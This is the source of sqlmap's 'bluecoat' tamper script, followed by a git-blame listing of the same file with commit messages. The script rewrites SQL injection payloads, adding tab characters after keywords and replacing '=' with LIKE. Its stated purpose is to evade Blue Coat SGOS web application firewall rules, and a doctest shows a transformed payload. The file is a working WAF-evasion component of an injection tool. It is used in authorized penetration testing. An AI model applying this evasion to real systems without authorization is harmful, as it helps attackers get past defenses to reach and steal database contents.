sqlmap/tamper/bluecoat.py

#!/usr/bin/env python

"""
Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)
See the file 'LICENSE' for copying permission
"""

import re

from lib.core.data import kb
from lib.core.enums import PRIORITY

__priority__ = PRIORITY.NORMAL

def dependencies():
    pass

def tamper(payload, **kwargs):
    """
    Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE

    Requirement:
        * Blue Coat SGOS with WAF activated as documented in
        https://kb.bluecoat.com/index?page=content&id=FAQ2147

    Tested against:
        * MySQL 5.1, SGOS

    Notes:
        * Useful to bypass Blue Coat's recommended WAF rule configuration

    >>> tamper('SELECT id FROM users WHERE id = 1')
    'SELECT%09id FROM%09users WHERE%09id LIKE 1'
    """

    def process(match):
        word = match.group('word')
        if word.upper() in kb.keywords:
            return match.group().replace(word, "%s%%09" % word)
        else:
            return match.group()

    retVal = payload

    if payload:
        retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]|\Z)", process, retVal)
        retVal = re.sub(r"\s*=\s*", " LIKE ", retVal)
        retVal = retVal.replace("%09 ", "%09")

    return retVal
Last preparations for DREI 2019-05-08 13:47:52 +03:00			`#!/usr/bin/env python`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00
			`"""`
Copyright year bump 2020-12-31 13:46:27 +03:00			`Copyright (c) 2006-2021 sqlmap developers (http://sqlmap.org/)`
Replacing doc/COPYING to LICENSE 2017-10-11 15:50:46 +03:00			`See the file 'LICENSE' for copying permission`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00			`"""`

			`import re`

Improvement to BlueCoat's tamper script 2014-08-28 14:34:15 +04:00			`from lib.core.data import kb`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00			`from lib.core.enums import PRIORITY`

Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`__priority__ = PRIORITY.NORMAL`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00
			`def dependencies():`
Fix of false statement (bluecoat.py was not meant to be used only against MySQL - Issue #261) 2012-11-29 18:53:54 +04:00			`pass`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00
Update for an Issue #12 2012-12-03 17:27:01 +04:00			`def tamper(payload, **kwargs):`
Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`"""`
Implementation for an Issue #3108 2018-07-31 03:18:33 +03:00			`Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00
			`Requirement:`
Fix of false statement (bluecoat.py was not meant to be used only against MySQL - Issue #261) 2012-11-29 18:53:54 +04:00			`* Blue Coat SGOS with WAF activated as documented in`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00			`https://kb.bluecoat.com/index?page=content&id=FAQ2147`

			`Tested against:`
Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`* MySQL 5.1, SGOS`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00
			`Notes:`
Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`* Useful to bypass Blue Coat's recommended WAF rule configuration`
Another update for an Issue #352 and couple of fixes 2013-03-14 00:57:09 +04:00
Improvement to BlueCoat's tamper script 2014-08-28 14:34:15 +04:00			`>>> tamper('SELECT id FROM users WHERE id = 1')`
			`'SELECT%09id FROM%09users WHERE%09id LIKE 1'`
Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`"""`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00
Improvement to BlueCoat's tamper script 2014-08-28 14:34:15 +04:00			`def process(match):`
			`word = match.group('word')`
			`if word.upper() in kb.keywords:`
			`return match.group().replace(word, "%s%%09" % word)`
			`else:`
			`return match.group()`

Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`retVal = payload`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00
Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`if payload:`
Minor refactoring 2019-05-30 23:55:54 +03:00			`retVal = re.sub(r"\b(?P<word>[A-Z_]+)(?=[^\w(]\|\Z)", process, retVal)`
Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`retVal = re.sub(r"\s=\s", " LIKE ", retVal)`
Improvement to BlueCoat's tamper script 2014-08-28 14:34:15 +04:00			`retVal = retVal.replace("%09 ", "%09")`
Tamper for BlueCoat SGos WAF 2012-11-03 22:15:22 +04:00
Refactoring code in tamper/bluecoat.py 2012-11-05 16:09:53 +04:00			`return retVal`